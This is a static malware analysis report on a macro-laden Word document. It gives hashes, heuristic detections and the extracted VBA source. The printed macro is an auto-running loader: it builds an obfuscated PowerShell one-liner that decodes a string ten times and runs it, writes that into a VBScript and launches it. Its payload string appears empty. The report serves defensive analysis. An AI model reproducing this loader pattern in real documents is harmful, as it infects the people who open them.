Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 cb3c593e3d60331c…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 35.0 KB
Created: 2021-02-17 08:21:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-02-23
MD5: 22a00308eb83565200afa390984a0a83
SHA-1: 20250ce1bdfdf3393161237acbff7321b989188a
SHA-256: cb3c593e3d60331c11498434a4b3a1323827bda0311abc38e663c701ad0e4a0c
Risk score: 250

Heuristics (8)

  • VBA project inside OOXML (medium; 5 related findings) [OOXML_VBA]
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA (critical) [OLE_VBA_SHELL]
    Matched line in script:
        Shell "cscript C:\Users\WinUline\AppData\code.vbs", vbNormalFocus
  • WScript.Shell usage (critical) [OLE_VBA_WSCRIPT]
    Matched line in script:
        x = "Set oShell = CreateObject (""WScript.Shell"")" & vbNewLine & "oShell.Run" & Chr(34) & XCsmNd & Chr(34)
  • CreateObject call (high) [OLE_VBA_CREATEOBJ]
    Matched line in script:
        x = "Set oShell = CreateObject (""WScript.Shell"")" & vbNewLine & "oShell.Run" & Chr(34) & XCsmNd & Chr(34)
  • VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro (low) [OLE_VBA_AUTOOPEN]
    Matched line in script:
        Sub AutoOpen()
  • Suspicious extracted artifact (medium) [EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (in document text: OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 20224 bytes
SHA-256: c2c510e154c91a7827341302aa9fc61c7721f6c69d3b9bba628b6e5898c68394
Detection (ClamAV): No threats found
Obfuscation or payload: likely
383 of 422 identifiers look randomly generated (e.g. 'RldOWkRWU1U1YkRYa2NXZHMxMFcxV1') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()
    ' Runs automatically when the document is opened (OLE_VBA_AUTOOPEN finding)
    Dim msgBoXX As Object
    Dim XTukL, XCsmNd As String
    XTukL = VVV
    ' Builds a PowerShell command line; the "XXX" split hides the literal "powershell".
    ' The one-liner reverses the string returned by VVV, swaps each pair of adjacent
    ' characters back, base64-decodes the result ten times and hands it to Invoke-Expression.
    XCsmNd = Replace("poXXXweXXXrshXXXelXXXl", "XXX", "") & " -Command $t= " & Chr(39) & XTukL & Chr(39) & ";$x=$t.ToCharArray();[array]::Reverse($x);$n =$t.length;$b='';for($i=0;$i -le $n; $i=$i+2){$b=$b+$x[$i+1]+$x[$i]} for($i=0;$i -lt 10;$i++){$b=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($b))};Invoke-Expression -Command $b"

    ' Writes a two-line VBScript (WScript.Shell object + Run of the PowerShell command) to disk
    ' via savefile, then launches it with cscript (OLE_VBA_WSCRIPT / OLE_VBA_SHELL findings)
    Dim x As String
    x = "Set oShell = CreateObject (""WScript.Shell"")" & vbNewLine & "oShell.Run" & Chr(34) & XCsmNd & Chr(34)
    savefile x
    Shell "cscript C:\Users\WinUline\AppData\code.vbs", vbNormalFocus
End Sub
Function VVV()
    ' Returns the encoded payload, assembled by concatenating fixed string chunks
    Dim str As String
    str = ""
    VVV = str
End Function

Sub savefile(XX)
    ' Writes the generated VBScript to the hard-coded path that AutoOpen then runs with cscript
    Dim filePath As String
    filePath = "C:\Users\WinUline\AppData\code.vbs"
    Dim fso As Object
    Set fso = CreateObject("Scripting.FileSystemObject")
    Dim oFile As Object
    Set oFile = fso.CreateTextFile(filePath)
    oFile.WriteLine XX
    oFile.Close
End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 48640 bytes
SHA-256: a9730be018470d5e55c79fedf22550bd2138f95e955d6a41c183959dc3aa6a8f
Detection (ClamAV): No threats found
Obfuscation or payload: likely
1004 of 1300 identifiers look randomly generated (e.g. 'RXMWZkdFpXWF1SUmBhWHhTVkJtS11w') — consistent with name-mangling obfuscation.